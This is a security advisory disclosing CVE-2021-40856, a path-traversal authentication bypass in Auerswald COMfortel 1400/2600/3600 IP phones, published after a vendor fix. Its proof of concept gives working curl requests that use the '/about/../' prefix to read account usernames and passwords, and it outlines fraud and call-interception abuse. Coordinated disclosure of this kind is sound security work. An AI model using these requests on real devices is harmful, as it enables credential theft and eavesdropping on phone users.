Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass RedTeam Pentesting discovered a vulnerability in the web-based configuration management interface of the Auerswald COMfortel 1400 and 2600 IP desktop phones. The vulnerability allows accessing configuration data and settings in the web-based management interface without authentication. Details ======= Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP Affected Versions: <= 2.8F Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP) Vulnerability Type: Authentication Bypass Security Risk: high Vendor URL: https://www.auerswald.de Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004 Advisory Status: published CVE: CVE-2021-40856 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 Introduction ============ "The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and IP system phone), with 4.3" colour touch display and preconfigured answering machine" (from the vendor's homepage) More Details ============ During a penetration test it was discovened that several VoIP phones (COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow accessing administrative functions without login credentials, bypassing the authentication. This can be achieved by simply prefixing API endpoints that require authentication with "/about/../", since the "/about" endpoint does not require any authentication. Proof of Concept ================ The phones run a web-based management interface on Port 80. If accessed, the HTTP response code 401 together with a website redirecting to the path "/statics/pageChallenge.html" is returned. This can for example be seen using the command-line HTTP client curl[1] as follows: ------------------------------------------------------------------------ $ curl --include 'http://192.168.1.190/' HTTP/1.1 401 Unauthorized [...] ------------------------------------------------------------------------ The website contains JavaScript code that requests the path "/about?action=get" and loads a JSON document (formatted and shortened to increase readability): ------------------------------------------------------------------------ $ curl --include 'http://192.168.1.190/about?action=get' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 3673 Date: Mon, 30 Aug 2021 08:39:24 GMT Server: lighttpd { "DATA": { "firmware": { "TYPE": "DATAITEM", "VALUE": "2.8E", "KEY": "firmware" }, "serial": { "TYPE": "DATAITEM", "VALUE": "1234567890", "KEY": "serial" }, [...] } } ------------------------------------------------------------------------ Among other information, this JSON document contains the serial number and firmware version displayed on the website. This action can be accessed without authentication. Other endpoints require authentication, for example the path "/tree?action=get", from which the menu structure is loaded after successful authentication: ------------------------------------------------------------------------ $ curl --include 'http://192.168.1.190/tree?action=get' HTTP/1.1 401 Unauthorized [...] ------------------------------------------------------------------------ During the penetration test, it was discovered that this action can successfully be requested by inserting the prefix "/about/../". In order to prevent curl from normalizing the URL path, the option "--path-as-is" must be supplied: ------------------------------------------------------------------------ $ curl --include --path-as-is \ 'http://192.168.1.190/about/../tree?action=get' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 3808 Date: Mon, 30 Aug 2021 08:42:11 GMT Server: lighttpd { "TYPE": "TREENODEPAGE", "ITEMS": { "COUNT": 2, "TYPE": "ITEMLIST", "1": { "id": 31, "text": "applications_settings", "TYPE": "TREENODEPAGE", "ITEMS": { "COUNT": 1, "TYPE": "ITEMLIST", "0": { "target": "pageFunctionkeys.html", "id": 32, "action": "/functionkeys", "text": "key_app", "pagename": "Functionkeys", "TYPE": "TREENODEPAGE" } } }, [...] } } ------------------------------------------------------------------------ The endpoint "/account" allows listing account data: ------------------------------------------------------------------------ $ curl --include --path-as-is \ 'http://192.168.1.190/about/../account?action=list' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 793 Date: Mon, 30 Aug 2021 08:43:33 GMT Server: lighttpd { "DATA": { [...] "accountList0": { "KEY": "accountList0", "COUNT": 1, "TYPE": "DATAMODEL", "VALUE": { "0": { "ID": 32327, "PARENTID": 0, "PROVIDER": "ProviderName", "NAME": "123 Example User", "STATUS": 4, "DEFAULT": 1 } }, [...] }, } } ------------------------------------------------------------------------ The ID 32327 can then be used to get details about that particular account, including the username and password: ------------------------------------------------------------------------ $ curl --include --path-as-is \ 'http://192.168.1.190/about/../account?action=get&itemID=32327' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 2026 Date: Mon, 30 Aug 2021 08:44:13 GMT Server: lighttpd { "DATA": { [...] "Benutzer": { "TYPE": "DATAITEM", "VALUE": "123", "KEY": "Benutzer" }, "Passwort": { "TYPE": "DATAITEM", "VALUE": "secret", "KEY": "Passwort" }, [...] } } ------------------------------------------------------------------------ Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to access and use the web-based management interface as if regular login credentials were presented. It is likely that other functionality can be accessed in the same way, to for example change settings or activate the integrated option for recording the Ethernet traffic. Workaround ========== Disable the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk ============= Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. Attackers can then authenticate at the PBX as the respective phone and for example call premium rate phone lines they operate to generate revenue. They can also configure a device they control as the PBX in the phone, so all incoming and outgoing phone calls are intercepted and can be recorded. The device also contains a function to record all Ethernet data traffic, which is likely affected as well. Overall, the vulnerability completely bypasses the authentication for the web-based management interface and therefore poses a high risk. References ========== [1] https://curl.se [2] https://github.com/zaproxy/zaproxy/ Timeline ======== 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-04 Vendor provides access to device with fixed firmware 2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-10-14 Vendor releases corrected firmware version 2.8G 2021-12-06 Advisory published RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen